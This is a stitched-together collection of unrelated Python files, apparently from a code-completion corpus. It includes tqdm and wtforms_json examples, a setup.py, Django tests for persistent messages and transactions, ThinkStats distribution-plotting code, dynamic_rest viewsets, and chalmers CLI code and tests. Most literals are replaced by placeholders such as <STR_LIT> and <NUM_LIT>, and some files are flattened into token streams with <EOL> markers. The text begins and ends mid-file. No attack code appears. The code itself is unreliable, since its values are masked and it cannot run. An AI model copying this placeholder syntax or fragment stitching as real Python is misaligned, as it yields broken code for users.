        """pyglet clock callback: mark this bullet dead so it gets removed."""
        self.dead = True
<s> def test ( a , b = <NUM_LIT:50> , c = <NUM_LIT> ) : <EOL> print '<STR_LIT>' % ( a , b , c ) <EOL> test ( <NUM_LIT:1> ) <EOL> test ( <NUM_LIT:1> , <NUM_LIT:5> ) <EOL> test ( <NUM_LIT:1> , c = <NUM_LIT:10> ) </s>
'''Tiny arithmetic helper module.'''


def multiply(a, b):
    """Return the product of ``a`` and ``b``."""
    product = a * b
    return product
import time
from tqdm import *

# Three equivalent ways of wrapping an iterable in a tqdm progress bar
# (Python 2: the last loop uses xrange).
for i in tqdm(range(<NUM_LIT:100>), desc="<STR_LIT>", leave=True):
    time.sleep(<NUM_LIT>)

# trange(n) is shorthand for tqdm over a range of n.
for i in trange(<NUM_LIT:100>):
    time.sleep(<NUM_LIT>)

for i in tqdm(xrange(<NUM_LIT:100>)):
    time.sleep(<NUM_LIT>)
import wtforms_json
from wtforms import Form
from wtforms.fields import BooleanField, StringField

# Monkey-patch WTForms with JSON support (adds Form.from_json / patch_data).
wtforms_json.init()


class LocationForm(Form):
    name = StringField()
    address = StringField()


class EventForm(Form):
    name = StringField()
    is_public = BooleanField()


# NOTE: this local name shadows the stdlib ``json`` module.
json = {
    '<STR_LIT:name>': '<STR_LIT>',
    '<STR_LIT:location>': {'<STR_LIT:name>': '<STR_LIT>'},
}

# Build the form directly from the dict, then show full vs. patch data.
form = EventForm.from_json(json)
print(form.data)
print(form.patch_data)
<s> """<STR_LIT>""" <EOL> class Command ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , args ) : <EOL> self . args = args <EOL> def execute_command ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError </s>
from setuptools import setup

# Prefer the primary long-description file; fall back to the alternate
# file if the first one is missing.
try:
    with open('<STR_LIT>') as f:
        long_description = f.read()
except IOError:
    with open('<STR_LIT>') as f:
        long_description = f.read()

setup(
    name='<STR_LIT>',
    version='<STR_LIT>',
    description='<STR_LIT>',
    long_description=long_description,
    url='<STR_LIT>',
    author='<STR_LIT>',
    author_email='<STR_LIT>',
    license='<STR_LIT>',
    classifiers=[
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
    ],
    keywords='<STR_LIT>',
    packages=[
        '<STR_LIT>',
    ],
    install_requires=[
        '<STR_LIT>',
        '<STR_LIT>'
    ],
    # Console-script entry points installed with the package.
    entry_points={
        '<STR_LIT>': [
            '<STR_LIT>',
        ],
    },
)
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import datetime <EOL> from django . conf import settings <EOL> from django . contrib import messages <EOL> from django . contrib . auth import authenticate <EOL> from django . contrib . auth . models import AnonymousUser , User <EOL> from django . contrib . messages . storage import default_storage <EOL> from django . core . urlresolvers import reverse <EOL> from django . test import Client , TestCase <EOL> from django . test . utils import override_settings <EOL> from . import PERSISTENT_MESSAGE_LEVELS , WARNING_PERSISTENT <EOL> from . models import Message <EOL> class MessagesClient ( Client ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** defaults ) : <EOL> """<STR_LIT>""" <EOL> super ( MessagesClient , self ) . __init__ ( ** defaults ) <EOL> if '<STR_LIT>' in settings . INSTALLED_APPS : <EOL> self . _messages = default_storage ( self ) <EOL> def login ( self , ** credentials ) : <EOL> """<STR_LIT>""" <EOL> if super ( MessagesClient , self ) . login ( ** credentials ) : <EOL> self . user = authenticate ( ** credentials ) <EOL> return True <EOL> else : <EOL> self . user = AnonymousUser ( ) <EOL> return False <EOL> def logout ( self ) : <EOL> logout = super ( MessagesClient , self ) . logout ( ) <EOL> if hasattr ( self , '<STR_LIT:user>' ) : <EOL> self . user = None <EOL> return logout <EOL> class MessagesTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> client_class = MessagesClient <EOL> def _get_user ( self , username = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> user = User . objects . create ( username = username ) <EOL> user . set_password ( '<STR_LIT:password>' ) <EOL> user . save ( ) <EOL> return user <EOL> @ override_settings ( MESSAGE_LEVEL = <NUM_LIT:1> ) <EOL> def test_persist_message_levels ( self ) : <EOL> """<STR_LIT>""" <EOL> user = self . _get_user ( ) <EOL> self . client . login ( username = user . 
username , password = '<STR_LIT:password>' ) <EOL> for level in PERSISTENT_MESSAGE_LEVELS : <EOL> msg = '<STR_LIT>' . format ( level , datetime . datetime . now ( ) ) <EOL> messages . add_message ( self . client , level , msg ) <EOL> result = Message . objects . get ( level = level ) <EOL> self . assertEqual ( result . message , msg ) <EOL> self . assertEqual ( result . user , user ) <EOL> self . assertEqual ( result . extra_tags , u'<STR_LIT>' ) <EOL> self . assertIsNone ( result . expires ) <EOL> self . assertIsNotNone ( result . created ) <EOL> self . assertFalse ( result . read ) <EOL> def test_mark_as_read ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = self . _get_user ( ) . username , password = '<STR_LIT:password>' ) <EOL> messages . add_message ( self . client , WARNING_PERSISTENT , "<STR_LIT>" ) <EOL> result = Message . objects . all ( ) [ <NUM_LIT:0> ] <EOL> self . assertFalse ( result . read ) <EOL> url = reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : result . id } ) <EOL> self . client . get ( url ) <EOL> result = Message . objects . all ( ) [ <NUM_LIT:0> ] <EOL> self . assertTrue ( result . read ) <EOL> def test_for_other_user ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = self . _get_user ( ) . username , password = '<STR_LIT:password>' ) <EOL> user2 = self . _get_user ( username = "<STR_LIT>" ) <EOL> messages . add_message ( self . client , WARNING_PERSISTENT , "<STR_LIT>" , user = user2 ) <EOL> result = Message . objects . all ( ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( result . user , user2 ) <EOL> def test_mark_message_read_for_other_user ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = self . _get_user ( ) . username , password = '<STR_LIT:password>' ) <EOL> user2 = self . _get_user ( username = "<STR_LIT>" ) <EOL> messages . add_message ( self . client , WARNING_PERSISTENT , "<STR_LIT>" , user = user2 ) <EOL> result = Message . objects . 
all ( ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( result . user , user2 ) <EOL> url = reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : result . id } ) <EOL> self . client . get ( url ) <EOL> result = Message . objects . all ( ) [ <NUM_LIT:0> ] <EOL> self . assertFalse ( result . read ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import math <EOL> import numpy as np <EOL> import pandas <EOL> import nsfg <EOL> import thinkplot <EOL> import thinkstats2 <EOL> def ParetoMedian ( xmin , alpha ) : <EOL> """<STR_LIT>""" <EOL> return xmin * pow ( <NUM_LIT:2> , <NUM_LIT:1> / alpha ) <EOL> def MakeExpoCdf ( ) : <EOL> """<STR_LIT>""" <EOL> thinkplot . PrePlot ( <NUM_LIT:3> ) <EOL> for lam in [ <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:0.5> ] : <EOL> xs , ps = thinkstats2 . RenderExpoCdf ( lam , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:50> ) <EOL> label = r'<STR_LIT>' % lam <EOL> thinkplot . Plot ( xs , ps , label = label ) <EOL> thinkplot . Save ( root = '<STR_LIT>' , <EOL> title = '<STR_LIT>' , <EOL> xlabel = '<STR_LIT:x>' , <EOL> ylabel = '<STR_LIT>' ) <EOL> def ReadBabyBoom ( filename = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> var_info = [ <EOL> ( '<STR_LIT:time>' , <NUM_LIT:1> , <NUM_LIT:8> , int ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:9> , <NUM_LIT:16> , int ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , int ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT:32> , int ) , <EOL> ] <EOL> columns = [ '<STR_LIT:name>' , '<STR_LIT:start>' , '<STR_LIT:end>' , '<STR_LIT:type>' ] <EOL> variables = pandas . DataFrame ( var_info , columns = columns ) <EOL> variables . end += <NUM_LIT:1> <EOL> dct = thinkstats2 . FixedWidthVariables ( variables , index_base = <NUM_LIT:1> ) <EOL> df = dct . ReadFixedWidth ( filename , skiprows = <NUM_LIT> ) <EOL> return df <EOL> def MakeBabyBoom ( ) : <EOL> """<STR_LIT>""" <EOL> df = ReadBabyBoom ( ) <EOL> diffs = df . minutes . diff ( ) <EOL> cdf = thinkstats2 . Cdf ( diffs , label = '<STR_LIT>' ) <EOL> thinkplot . PrePlot ( cols = <NUM_LIT:2> ) <EOL> thinkplot . Cdf ( cdf ) <EOL> thinkplot . Config ( xlabel = '<STR_LIT>' , <EOL> ylabel = '<STR_LIT>' , <EOL> legend = False ) <EOL> thinkplot . SubPlot ( <NUM_LIT:2> ) <EOL> thinkplot . Cdf ( cdf , complement = True ) <EOL> thinkplot . 
Config ( xlabel = '<STR_LIT>' , <EOL> ylabel = '<STR_LIT>' , <EOL> yscale = '<STR_LIT>' , <EOL> legend = False ) <EOL> thinkplot . Save ( root = '<STR_LIT>' , <EOL> legend = False ) <EOL> def MakeParetoCdf ( ) : <EOL> """<STR_LIT>""" <EOL> xmin = <NUM_LIT:0.5> <EOL> thinkplot . PrePlot ( <NUM_LIT:3> ) <EOL> for alpha in [ <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:0.5> ] : <EOL> xs , ps = thinkstats2 . RenderParetoCdf ( xmin , alpha , <NUM_LIT:0> , <NUM_LIT> , n = <NUM_LIT:100> ) <EOL> thinkplot . Plot ( xs , ps , label = r'<STR_LIT>' % alpha ) <EOL> thinkplot . Save ( root = '<STR_LIT>' , <EOL> title = '<STR_LIT>' , <EOL> xlabel = '<STR_LIT:x>' , <EOL> ylabel = '<STR_LIT>' ) <EOL> def MakeParetoCdf2 ( ) : <EOL> """<STR_LIT>""" <EOL> xmin = <NUM_LIT:100> <EOL> alpha = <NUM_LIT> <EOL> xs , ps = thinkstats2 . RenderParetoCdf ( xmin , alpha , <NUM_LIT:0> , <NUM_LIT> , n = <NUM_LIT:100> ) <EOL> thinkplot . Plot ( xs , ps ) <EOL> thinkplot . Save ( root = '<STR_LIT>' , <EOL> title = '<STR_LIT>' , <EOL> xlabel = '<STR_LIT>' , <EOL> ylabel = '<STR_LIT>' , <EOL> legend = False ) <EOL> def MakeNormalCdf ( ) : <EOL> """<STR_LIT>""" <EOL> thinkplot . PrePlot ( <NUM_LIT:3> ) <EOL> mus = [ <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ] <EOL> sigmas = [ <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] <EOL> for mu , sigma in zip ( mus , sigmas ) : <EOL> xs , ps = thinkstats2 . RenderNormalCdf ( mu = mu , sigma = sigma , <EOL> low = - <NUM_LIT:1.0> , high = <NUM_LIT> ) <EOL> label = r'<STR_LIT>' % ( mu , sigma ) <EOL> thinkplot . Plot ( xs , ps , label = label ) <EOL> thinkplot . Save ( root = '<STR_LIT>' , <EOL> title = '<STR_LIT>' , <EOL> xlabel = '<STR_LIT:x>' , <EOL> ylabel = '<STR_LIT>' , <EOL> loc = <NUM_LIT:2> ) <EOL> def MakeNormalModel ( weights ) : <EOL> """<STR_LIT>""" <EOL> mu , var = thinkstats2 . TrimmedMeanVar ( weights , p = <NUM_LIT> ) <EOL> print ( '<STR_LIT>' , mu , var ) <EOL> sigma = math . sqrt ( var ) <EOL> print ( '<STR_LIT>' , sigma ) <EOL> xs , ps = thinkstats2 . 
RenderNormalCdf ( mu , sigma , low = <NUM_LIT:0> , high = <NUM_LIT> ) <EOL> thinkplot . Plot ( xs , ps , label = '<STR_LIT>' , color = '<STR_LIT>' ) <EOL> cdf = thinkstats2 . Cdf ( weights , label = '<STR_LIT:data>' ) <EOL> thinkplot . PrePlot ( <NUM_LIT:1> ) <EOL> thinkplot . Cdf ( cdf ) <EOL> thinkplot . Save ( root = '<STR_LIT>' , <EOL> title = '<STR_LIT>' , <EOL> xlabel = '<STR_LIT>' , <EOL> ylabel = '<STR_LIT>' ) <EOL> def MakeExampleNormalPlot ( ) : <EOL> """<STR_LIT>""" <EOL> n = <NUM_LIT:1000> <EOL> thinkplot . PrePlot ( <NUM_LIT:3> ) <EOL> mus = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> ] <EOL> sigmas = [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> for mu , sigma in zip ( mus , sigmas ) : <EOL> sample = np . random . normal ( mu , sigma , n ) <EOL> xs , ys = thinkstats2 . NormalProbability ( sample ) <EOL> label = '<STR_LIT>' % ( mu , sigma ) <EOL> thinkplot . Plot ( xs , ys , label = label ) <EOL> thinkplot . Save ( root = '<STR_LIT>' , <EOL> title = '<STR_LIT>' , <EOL> xlabel = '<STR_LIT>' , <EOL> ylabel = '<STR_LIT>' ) <EOL> def MakeNormalPlot ( weights , term_weights ) : <EOL> """<STR_LIT>""" <EOL> mean , var = thinkstats2 . TrimmedMeanVar ( weights , p = <NUM_LIT> ) <EOL> std = math . sqrt ( var ) <EOL> xs = [ - <NUM_LIT:4> , <NUM_LIT:4> ] <EOL> fxs , fys = thinkstats2 . FitLine ( xs , mean , std ) <EOL> thinkplot . Plot ( fxs , fys , linewidth = <NUM_LIT:4> , color = '<STR_LIT>' ) <EOL> thinkplot . PrePlot ( <NUM_LIT:2> ) <EOL> xs , ys = thinkstats2 . NormalProbability ( weights ) <EOL> thinkplot . Plot ( xs , ys , label = '<STR_LIT>' ) <EOL> xs , ys = thinkstats2 . NormalProbability ( term_weights ) <EOL> thinkplot . Plot ( xs , ys , label = '<STR_LIT>' ) <EOL> thinkplot . Save ( root = '<STR_LIT>' , <EOL> title = '<STR_LIT>' , <EOL> xlabel = '<STR_LIT>' , <EOL> ylabel = '<STR_LIT>' ) <EOL> def main ( ) : <EOL> thinkstats2 . 
RandomSeed ( <NUM_LIT> ) <EOL> MakeExampleNormalPlot ( ) <EOL> MakeExpoCdf ( ) <EOL> MakeBabyBoom ( ) <EOL> MakeParetoCdf ( ) <EOL> MakeParetoCdf2 ( ) <EOL> MakeNormalCdf ( ) <EOL> preg = nsfg . ReadFemPreg ( ) <EOL> full_term = preg [ preg . prglngth >= <NUM_LIT> ] <EOL> weights = preg . totalwgt_lb . dropna ( ) <EOL> term_weights = full_term . totalwgt_lb . dropna ( ) <EOL> MakeNormalModel ( weights ) <EOL> MakeNormalPlot ( weights , term_weights ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
import urllib2

from djangosanetesting.cases import DatabaseTestCase, DestructiveDatabaseTestCase, HttpTestCase
from djangosanetesting.utils import mock_settings, get_live_server_path

from testapp.models import ExampleModel

import django


class TestDatabaseRollbackCase(DatabaseTestCase):
    """Verify each test starts from a rolled-back, empty database."""

    def test_inserting_two(self):
        # Table must be empty at test start, proving prior rollback.
        self.assert_equals(<NUM_LIT:0>, len(ExampleModel.objects.all()))
        ExampleModel.objects.create(name="<STR_LIT>")
        ExampleModel.objects.create(name="<STR_LIT>")
        self.assert_equals(<NUM_LIT:2>, len(ExampleModel.objects.all()))

    def test_inserting_two_again(self):
        # Identical to the previous test: passes only if that one rolled back.
        self.assert_equals(<NUM_LIT:0>, len(ExampleModel.objects.all()))
        ExampleModel.objects.create(name="<STR_LIT>")
        ExampleModel.objects.create(name="<STR_LIT>")
        self.assert_equals(<NUM_LIT:2>, len(ExampleModel.objects.all()))

    def test_client_available(self):
        res = self.client.get('<STR_LIT>')
        self.assert_equals(<NUM_LIT:200>, res.status_code)


class TestProperClashing(DatabaseTestCase):
    """Rely on alphabetical method order (aaa/bbb/ccc) to verify that
    explicitly committed data survives across test methods."""

    def test_aaa_commit_object(self):
        ExampleModel.objects.create(name="<STR_LIT>")
        self.transaction.commit()

    def test_bbb_object_present(self):
        self.assert_equals(<NUM_LIT:1>, len(ExampleModel.objects.all()))

    def test_ccc_object_still_present(self):
        self.assert_equals(<NUM_LIT:1>, len(ExampleModel.objects.all()))
        # Clean up the committed row so later tests see an empty table.
        ExampleModel.objects.all()[<NUM_LIT:0>].delete()
        self.transaction.commit()


class TestFixturesLoadedProperly(HttpTestCase):
    fixtures = ["<STR_LIT>"]

    def test_model_loaded(self):
        self.assert_equals(<NUM_LIT:2>, len(ExampleModel.objects.all()))

    def test_available_in_another_thread(self):
        # Fixture data must also be visible to the live test server thread.
        self.assertEquals(u'<STR_LIT>', self.urlopen('<STR_LIT>' % get_live_server_path()).read())


class TestDjangoOneTwoMultipleDatabases(DestructiveDatabaseTestCase):
    """Exercise multi-database flushing; requires Django >= 1.2."""

    def setUp(self):
        super(TestDjangoOneTwoMultipleDatabases, self).setUp()
        # Skip on Django < 1.2, which lacks multi-database support.
        if django.VERSION[<NUM_LIT:0>] < <NUM_LIT:1> or (django.VERSION[<NUM_LIT:0>] == <NUM_LIT:1> and django.VERSION[<NUM_LIT:1>] < <NUM_LIT:2>):
            raise self.SkipTest("<STR_LIT>")

    @mock_settings("<STR_LIT>", None)
    @mock_settings("<STR_LIT>", {
    })
    def test_multiple_databases_flushed(self):
        pass
<s> """<STR_LIT>""" <EOL> from collections import OrderedDict <EOL> from django . utils . encoding import force_text <EOL> from rest_framework . fields import empty <EOL> from rest_framework . metadata import SimpleMetadata <EOL> from rest_framework . serializers import ListSerializer , ModelSerializer <EOL> from dynamic_rest . fields import DynamicRelationField <EOL> class DynamicMetadata ( SimpleMetadata ) : <EOL> """<STR_LIT>""" <EOL> def determine_actions ( self , request , view ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def determine_metadata ( self , request , view ) : <EOL> """<STR_LIT>""" <EOL> metadata = super ( <EOL> DynamicMetadata , <EOL> self ) . determine_metadata ( <EOL> request , <EOL> view ) <EOL> metadata [ '<STR_LIT>' ] = getattr ( view , '<STR_LIT>' , [ ] ) <EOL> if hasattr ( view , '<STR_LIT>' ) : <EOL> serializer = view . get_serializer ( dynamic = False ) <EOL> if hasattr ( serializer , '<STR_LIT>' ) : <EOL> metadata [ '<STR_LIT>' ] = serializer . get_name ( ) <EOL> if hasattr ( serializer , '<STR_LIT>' ) : <EOL> metadata [ '<STR_LIT>' ] = serializer . get_plural_name ( ) <EOL> metadata [ '<STR_LIT>' ] = self . get_serializer_info ( serializer ) <EOL> return metadata <EOL> def get_field_info ( self , field ) : <EOL> """<STR_LIT>""" <EOL> field_info = OrderedDict ( ) <EOL> for attr in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:default>' , '<STR_LIT:label>' ) : <EOL> field_info [ attr ] = getattr ( field , attr ) <EOL> if field_info [ '<STR_LIT:default>' ] is empty : <EOL> field_info [ '<STR_LIT:default>' ] = None <EOL> field_info [ '<STR_LIT>' ] = field . allow_null <EOL> if hasattr ( field , '<STR_LIT>' ) : <EOL> field_info [ '<STR_LIT>' ] = [ <EOL> { <EOL> '<STR_LIT:value>' : choice_value , <EOL> '<STR_LIT>' : force_text ( choice_name , strings_only = True ) <EOL> } <EOL> for choice_value , choice_name in field . choices . items ( ) <EOL> ] <EOL> many = False <EOL> if isinstance ( field , DynamicRelationField ) : <EOL> field = field . 
serializer <EOL> if isinstance ( field , ListSerializer ) : <EOL> field = field . child <EOL> many = True <EOL> if isinstance ( field , ModelSerializer ) : <EOL> type = '<STR_LIT>' if many else '<STR_LIT>' <EOL> field_info [ '<STR_LIT>' ] = field . get_plural_name ( ) <EOL> else : <EOL> type = self . label_lookup [ field ] <EOL> field_info [ '<STR_LIT:type>' ] = type <EOL> return field_info </s>
from rest_framework import exceptions

from dynamic_rest.viewsets import DynamicModelViewSet

from tests.models import Cat, Dog, Group, Horse, Location, Profile, User, Zebra
from tests.serializers import (
    CatSerializer,
    DogSerializer,
    GroupSerializer,
    HorseSerializer,
    LocationSerializer,
    ProfileSerializer,
    UserLocationSerializer,
    UserSerializer,
    ZebraSerializer
)


class UserViewSet(DynamicModelViewSet):
    """User endpoint with include/exclude/filter/sort features enabled."""
    features = (
        DynamicModelViewSet.INCLUDE, DynamicModelViewSet.EXCLUDE,
        DynamicModelViewSet.FILTER, DynamicModelViewSet.SORT
    )
    model = User
    serializer_class = UserSerializer
    queryset = User.objects.all()

    def get_queryset(self):
        # Optionally narrow the queryset by a ?location= query parameter.
        location = self.request.query_params.get('<STR_LIT:location>')
        qs = self.queryset
        if location:
            qs = qs.filter(location=location)
        return qs

    def list(self, request, *args, **kwargs):
        # Translate a ?name= parameter into the dynamic filter parameter form.
        query_params = self.request.query_params
        if query_params.get('<STR_LIT:name>'):
            query_params.add('<STR_LIT>', query_params.get('<STR_LIT:name>'))
        return super(UserViewSet, self).list(request, *args, **kwargs)


class GroupNoMergeDictViewSet(DynamicModelViewSet):
    """Group endpoint that validates request.data is a plain dict on create."""
    model = Group
    serializer_class = GroupSerializer
    queryset = Group.objects.all()

    def create(self, request, *args, **kwargs):
        response = super(GroupNoMergeDictViewSet, self).create(
            request,
            *args,
            **kwargs
        )
        if hasattr(request, '<STR_LIT:data>'):
            try:
                # MergeDict only exists on older Django; newer versions raise
                # ImportError here.
                from django.utils.datastructures import MergeDict
                if isinstance(request.data, MergeDict):
                    raise exceptions.ValidationError(
                        "<STR_LIT>"
                    )
                elif not isinstance(request.data, dict):
                    raise exceptions.ValidationError(
                        "<STR_LIT>"
                    )
            except:
                # NOTE(review): this bare except also swallows the two
                # ValidationErrors raised above, not just the ImportError --
                # confirm whether that is intended.
                pass
        return response


class GroupViewSet(DynamicModelViewSet):
    features = (
        DynamicModelViewSet.INCLUDE, DynamicModelViewSet.EXCLUDE,
        DynamicModelViewSet.FILTER, DynamicModelViewSet.SORT
    )
    model = Group
    serializer_class = GroupSerializer
    queryset = Group.objects.all()


class LocationViewSet(DynamicModelViewSet):
    features = (
        DynamicModelViewSet.INCLUDE, DynamicModelViewSet.EXCLUDE,
        DynamicModelViewSet.FILTER, DynamicModelViewSet.SORT
    )
    model = Location
    serializer_class = LocationSerializer
    queryset = Location.objects.all()


class UserLocationViewSet(DynamicModelViewSet):
    # Same model as UserViewSet but with a location-focused serializer.
    model = User
    serializer_class = UserLocationSerializer
    queryset = User.objects.all()


class ProfileViewSet(DynamicModelViewSet):
    features = (
        DynamicModelViewSet.EXCLUDE,
        DynamicModelViewSet.FILTER,
        DynamicModelViewSet.INCLUDE,
        DynamicModelViewSet.SORT
    )
    model = Profile
    serializer_class = ProfileSerializer
    queryset = Profile.objects.all()


class CatViewSet(DynamicModelViewSet):
    serializer_class = CatSerializer
    queryset = Cat.objects.all()


class DogViewSet(DynamicModelViewSet):
    model = Dog
    serializer_class = DogSerializer
    queryset = Dog.objects.all()


class HorseViewSet(DynamicModelViewSet):
    features = (DynamicModelViewSet.SORT,)
    model = Horse
    serializer_class = HorseSerializer
    queryset = Horse.objects.all()
    ordering_fields = ('<STR_LIT:name>',)
    ordering = ('<STR_LIT>',)


class ZebraViewSet(DynamicModelViewSet):
    features = (DynamicModelViewSet.SORT,)
    model = Zebra
    serializer_class = ZebraSerializer
    queryset = Zebra.objects.all()
    # NOTE(review): a plain string here, unlike HorseViewSet's tuple --
    # presumably a special value like '__all__'; confirm.
    ordering_fields = '<STR_LIT>'
import os
import sys

# Standard Django manage.py entry point.
if __name__ == "<STR_LIT:__main__>":
    # Provide a default settings module; an existing environment value wins.
    os.environ.setdefault("<STR_LIT>", "<STR_LIT>")
    from django.core.management import execute_from_command_line
    execute_from_command_line(sys.argv)
'''<STR_LIT>'''
from __future__ import unicode_literals, print_function

from argparse import RawDescriptionHelpFormatter
import logging
import sys

from clyent import print_colors

from chalmers import errors
from chalmers.utils import cli

log = logging.getLogger('<STR_LIT>')


def main(args):
    """Stop the selected programs (the `stop` subcommand)."""
    programs = cli.select_programs(args, filter_paused=False, force=args.force)
    # Only programs that are actually running can be stopped.
    programs = cli.filter_programs(programs, lambda p: not p.is_running, '<STR_LIT>', '<STR_LIT>')
    if not programs:
        return
    for prog in programs:
        if prog.is_running:
            # Print progress inline, flushing so it appears before stop() blocks.
            print("<STR_LIT>" % prog.name[:<NUM_LIT>], end='<STR_LIT>'); sys.stdout.flush()
            try:
                prog.stop(args.force)
            except errors.StateError as err:
                # NOTE(review): `err.message` is removed in Python 3 --
                # confirm this targets Python 2 only or use str(err).
                log.error(err.message)
            except errors.ConnectionError as err:
                print_colors("<STR_LIT>" % err.message)
            else:
                print_colors("<STR_LIT>")
        else:
            print_colors("<STR_LIT>" % prog.name[:<NUM_LIT>], "<STR_LIT>")


def pause_main(args):
    """Mark programs as paused; does not stop already-running ones."""
    programs = cli.select_programs(args, filter_paused=False)
    programs = cli.filter_programs(programs, lambda p: p.is_paused, '<STR_LIT>', '<STR_LIT>')
    if not programs:
        return
    for prog in programs:
        log.info("<STR_LIT>" % (prog.name))
        if prog.is_running:
            # Warn: pausing does not stop a running program.
            log.warn("<STR_LIT>" % (prog.name))
        prog.state.update(paused=True)


def unpause_main(args):
    """Clear the paused flag; does not start stopped programs."""
    programs = cli.select_programs(args, filter_paused=False)
    programs = cli.filter_programs(programs, lambda p: not p.is_paused, '<STR_LIT>', '<STR_LIT>')
    if not programs:
        return
    for prog in programs:
        log.info("<STR_LIT>" % (prog.name))
        prog.state.update(paused=False)
        if not prog.is_running:
            log.warning("<STR_LIT>" % (prog.name))


def add_parser(subparsers):
    """Register the stop, pause, and unpause subcommands."""
    parser = subparsers.add_parser('<STR_LIT>',
                                   help='<STR_LIT>',
                                   description=__doc__,
                                   formatter_class=RawDescriptionHelpFormatter)
    cli.add_selection_group(parser)
    parser.add_argument('<STR_LIT>', action='<STR_LIT:store_true>',
                        help='<STR_LIT>'
                        )
    parser.set_defaults(main=main)
    parser = subparsers.add_parser('<STR_LIT>',
                                   help='<STR_LIT>',
                                   description=__doc__,
                                   formatter_class=RawDescriptionHelpFormatter)
    cli.add_selection_group(parser)
    parser.set_defaults(main=pause_main)
    parser = subparsers.add_parser('<STR_LIT>',
                                   help='<STR_LIT>',
                                   description=__doc__,
                                   formatter_class=RawDescriptionHelpFormatter)
    cli.add_selection_group(parser)
    parser.set_defaults(main=unpause_main)
from __future__ import print_function, unicode_literals

import io
import logging
import os
import shutil
import unittest

import mock
import yaml

from chalmers import config, errors
from chalmers.scripts import chalmers_main


class ChalmersCli(object):
    """Helper that invokes chalmers subcommands in-process and captures stdout."""

    def __init__(self):
        self.script = chalmers_main.__file__
        # Normalize compiled .pyc/.pyo paths back to the .py source file.
        if self.script.endswith('<STR_LIT>') or self.script.endswith('<STR_LIT>'):
            self.script = self.script[:-<NUM_LIT:1>]
        self.env = os.environ.copy()
        self.root = '<STR_LIT>'
        self.env['<STR_LIT>'] = self.root
        config.set_relative_dirs(self.root)
        logging.getLogger('<STR_LIT>').addHandler(logging.NullHandler())

    def __getattr__(self, subcommand):
        # Any attribute access becomes a runner for that chalmers subcommand.
        def run_subcommand(*args):
            cmd = ['<STR_LIT>', '<STR_LIT>', subcommand]
            cmd.extend(args)
            out = io.StringIO()
            log = logging.getLogger('<STR_LIT>')
            log.setLevel(logging.ERROR)
            del log.handlers[:]
            # Capture stdout while running the CLI entry point in-process.
            with mock.patch('<STR_LIT>', out), mock.patch('<STR_LIT>'):
                chalmers_main.main(cmd, False)
            return out.getvalue()
        return run_subcommand


class Test(unittest.TestCase):
    """End-to-end tests of the chalmers command line interface."""

    def setUp(self):
        self.cli = ChalmersCli()
        # Start each test from a clean chalmers root directory.
        if os.path.isdir(self.cli.root):
            shutil.rmtree(self.cli.root)
        unittest.TestCase.setUp(self)

    def tearDown(self):
        if os.path.isdir(self.cli.root):
            shutil.rmtree(self.cli.root)
        unittest.TestCase.tearDown(self)

    def test_add_show(self):
        self.cli.add('<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>')
        self.assertEqual(self.cli.show('<STR_LIT>', '<STR_LIT>').strip(), '<STR_LIT>')
        self.assertEqual(self.cli.show('<STR_LIT>', '<STR_LIT>').strip(), '<STR_LIT>')

    def test_cant_add_twice(self):
        self.cli.add('<STR_LIT>', '<STR_LIT>', '<STR_LIT>')
        with self.assertRaises(errors.ChalmersError):
            self.cli.add('<STR_LIT>', '<STR_LIT>', '<STR_LIT>')

    def test_add_remove(self):
        self.cli.add('<STR_LIT>', '<STR_LIT>', '<STR_LIT>')
        self.cli.remove('<STR_LIT>')

    def test_cant_remove_non_existent(self):
        with self.assertRaises(SystemExit):
            self.cli.remove('<STR_LIT>')

    def test_cant_start_non_existent(self):
        with self.assertRaises(SystemExit):
            self.cli.start('<STR_LIT>')

    def test_list_no_programs(self):
        out = self.cli.list()
        self.assertEqual(out.strip(), "<STR_LIT>")

    def test_list(self):
        out = self.cli.add('<STR_LIT>', '<STR_LIT>', '<STR_LIT>')
        out = self.cli.list()
        self.assertEqual(out.split(), ['<STR_LIT>', '<STR_LIT>'])

    def test_pause(self):
        # Toggle a program's paused state via the `on` / `off` subcommands.
        out = self.cli.add('<STR_LIT>', '<STR_LIT>', '<STR_LIT>')
        out = self.cli.list()
        self.assertEqual(out.split(), ['<STR_LIT>', '<STR_LIT>'])
        out = self.cli.on('<STR_LIT>')
        out = self.cli.list()
        self.assertEqual(out.split(), ['<STR_LIT>', '<STR_LIT>'])
        out = self.cli.off('<STR_LIT>')
        out = self.cli.list()
        self.assertEqual(out.split(), ['<STR_LIT>', '<STR_LIT>'])

    def test_show(self):
        self.cli.add('<STR_LIT>', '<STR_LIT>', '<STR_LIT>')
